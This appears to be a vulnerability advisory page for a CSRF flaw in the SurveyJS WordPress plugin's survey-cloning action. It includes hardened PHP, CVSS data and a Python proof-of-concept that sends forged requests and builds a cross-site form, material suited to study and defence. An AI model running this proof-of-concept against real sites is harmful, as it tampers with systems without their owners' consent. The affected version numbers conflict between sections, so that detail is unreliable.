Security Vulnerability Report
CVE-2025-13205 CVSS 4.3 MEDIUM

Published: 2026-01-24 09:15:52
Last Modified: 2026-04-15 00:35:42

Description

The SurveyJS: Drag & Drop WordPress Form Builder to create, style and embed multiple forms of any complexity plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.5.2. This is due to missing or incorrect nonce validation on the `SurveyJS_CloneSurvey` AJAX action. This makes it possible for unauthenticated attackers to duplicate surveys via a forged request, provided they can trick a site administrator into performing an action such as clicking on a link.
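The root cause named above (CWE-352: an `admin-ajax.php` action that trusts the caller's session cookie without a nonce) is a generic WordPress pattern. The following is an added illustration written for this page, not the plugin's own code, which is not reproduced here. It shows the unsafe shape of such a handler beside a hardened one; the function names, the nonce action string `surveyjs_clone_survey`, the POST field `nonce`, the script handle and the `example_duplicate_survey()` helper are all assumed. `check_ajax_referer()`, `current_user_can()`, `absint()`, `wp_send_json_error()`, `wp_send_json_success()`, `wp_create_nonce()` and `wp_localize_script()` are real WordPress core functions.

```php
<?php
// Added example, not the plugin's code. Names marked "assumed" are not taken
// from the page; example_duplicate_survey() is a hypothetical helper.

// --- Unsafe shape (the CWE-352 pattern the description refers to) ---------
// Nothing ties the request to a nonce, so a cross-site POST that the browser
// sends with the administrator's session cookie looks exactly like a
// legitimate click in wp-admin. Not registered below; shown for contrast.
function example_clone_survey_unsafe() {
    $survey_id = intval( $_POST['survey_id'] ?? 0 );
    example_duplicate_survey( $survey_id ); // hypothetical helper
    wp_send_json_success( array( 'cloned' => $survey_id ) );
}

// --- Hardened shape -------------------------------------------------------
add_action( 'wp_ajax_SurveyJS_CloneSurvey', 'example_clone_survey_safe' );
function example_clone_survey_safe() {
    // Verifies the nonce bound to this user session and this action name.
    // On a missing or invalid nonce it replies HTTP 403 and stops execution.
    // 'surveyjs_clone_survey' (action) and 'nonce' (POST field) are assumed.
    check_ajax_referer( 'surveyjs_clone_survey', 'nonce' );

    // A nonce proves intent, not authority: still check the capability.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'insufficient privileges' ), 403 );
    }

    // Validate the input before touching the database.
    $survey_id = absint( $_POST['survey_id'] ?? 0 );
    if ( 0 === $survey_id ) {
        wp_send_json_error( array( 'message' => 'invalid survey id' ), 400 );
    }

    example_duplicate_survey( $survey_id ); // hypothetical helper
    wp_send_json_success( array( 'cloned' => $survey_id ) );
}

// The nonce has to reach the admin page's JavaScript, which then sends it as
// the 'nonce' field of the POST body. 'example-surveyjs-admin' is an assumed
// script handle that is expected to be enqueued elsewhere.
add_action( 'admin_enqueue_scripts', function () {
    wp_localize_script( 'example-surveyjs-admin', 'exampleSurveyJs', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'surveyjs_clone_survey' ),
    ) );
} );
```

Two points worth noting for reviewers of similar handlers: `check_ajax_referer()` alone is not an authorization check, so the `current_user_can()` test stays even when the nonce verifies; and registering the action only under `wp_ajax_` (not `wp_ajax_nopriv_`) keeps anonymous callers out, which matches the CVSS vector above (PR:N but UI:R, the attacker needs a logged-in administrator to act).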

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SurveyJS WordPress Form Builder plugin <= 2.5.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-13205 PoC - CSRF to Clone SurveyJS Survey
# This PoC demonstrates the CSRF vulnerability in SurveyJS WordPress plugin <= 2.5.2


def clone_survey(target_url, survey_id, admin_cookie=None):
    """
    Clone a survey via CSRF attack

    Args:
        target_url: Target WordPress site URL
        survey_id: ID of the survey to clone
        admin_cookie: Admin session cookie (if available)
    """
    ajax_url = f"{target_url}/wp-admin/admin-ajax.php"

    # Construct the CSRF payload
    data = {
        'action': 'SurveyJS_CloneSurvey',
        'survey_id': survey_id,
        'nonce': ''  # No nonce required due to vulnerability
    }
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    if admin_cookie:
        headers['Cookie'] = admin_cookie

    try:
        response = requests.post(ajax_url, data=data, headers=headers, timeout=10)
        print(f"[+] Request sent to {ajax_url}")
        print(f"[+] Response Status: {response.status_code}")
        print(f"[+] Response: {response.text[:500]}")
        return response
    except requests.RequestException as e:
        print(f"[-] Error: {e}")
        return None


def generate_csrf_html(target_url, survey_id):
    """
    Generate HTML page with auto-submitting CSRF form
    For authorized security testing only
    """
    html = f'''
<!DOCTYPE html>
<html>
<head>
    <title>SurveyJS Clone CSRF PoC</title>
</head>
<body>
    <h1>CSRF PoC - SurveyJS Clone Survey</h1>
    <p>Click the button below to clone survey ID: {survey_id}</p>
    <form id="csrf_form" method="POST" action="{target_url}/wp-admin/admin-ajax.php">
        <input type="hidden" name="action" value="SurveyJS_CloneSurvey">
        <input type="hidden" name="survey_id" value="{survey_id}">
        <button type="submit">Submit Request</button>
    </form>
    <script>
        // Auto-submit for demonstration
        // document.getElementById('csrf_form').submit();
    </script>
</body>
</html>
'''
    return html


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-13205.py <target_url> <survey_id>")
        print("Example: python cve-2025-13205.py http://example.com 1")
        sys.exit(1)

    target = sys.argv[1]
    survey_id = sys.argv[2]

    print(f"[*] CVE-2025-13205 PoC - SurveyJS CSRF Vulnerability")
    print(f"[*] Target: {target}")
    print(f"[*] Survey ID: {survey_id}")
    clone_survey(target, survey_id)
```

References

https://plugins.trac.wordpress.org/browser/surveyjs/tags/1.12.20/ajax_handlers/clone_survey.php#L8
https://www.wordfence.com/threat-intel/vulnerabilities/id/e1179303-fe7c-47f1-958c-2e4d2c574e4a?source=cve

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-13205", "sourceIdentifier": "[email protected]", "published": "2026-01-24T09:15:51.880", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The SurveyJS: Drag & Drop WordPress Form Builder to create, style and embed multiple forms of any complexity plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.5.2. This is due to missing or incorrect nonce validation on the `SurveyJS_CloneSurvey` AJAX action. This makes it possible for unauthenticated attackers to duplicate surveys via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}, {"lang": "es", "value": "El plugin SurveyJS: Drag &amp; Drop WordPress Form Builder to create, style and embed multiple forms of any complexity para WordPress es vulnerable a la falsificación de petición en sitios cruzados en todas las versiones hasta la 1.12.20, inclusive. Esto se debe a la validación de nonce faltante o incorrecta en la acción AJAX 'SurveyJS_CloneSurvey'. Esto hace posible que atacantes no autenticados dupliquen encuestas mediante una petición falsificada siempre que puedan engañar a un administrador del sitio para que realice una acción como hacer clic en un enlace."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/surveyjs/tags/1.12.20/ajax_handlers/clone_survey.php#L8", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e1179303-fe7c-47f1-958c-2e4d2c574e4a?source=cve", "source": "[email protected]"}]}}
```